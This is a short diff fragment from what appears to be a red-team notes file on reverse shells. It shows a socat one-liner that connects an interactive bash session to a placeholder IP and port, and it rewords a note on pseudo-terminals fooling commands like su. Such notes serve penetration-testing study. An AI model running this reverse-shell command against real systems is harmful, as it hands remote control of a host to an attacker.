xmehulx/Red-Team-notes/Foothold/Shells/Reverse Shell.md

 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:IP:PORT
 ```

-> The [pty module](https://docs.python.org/2/library/pty.html) let’s you spawn a pseudo-terminal that can fool commands like `su` into thinking they are being executed in a proper terminal.
+> The #pseudo-terminals  let’s you spawn a pseudo-terminal that can fool commands like `su` into thinking they are being executed in a proper terminal.

 ### Windows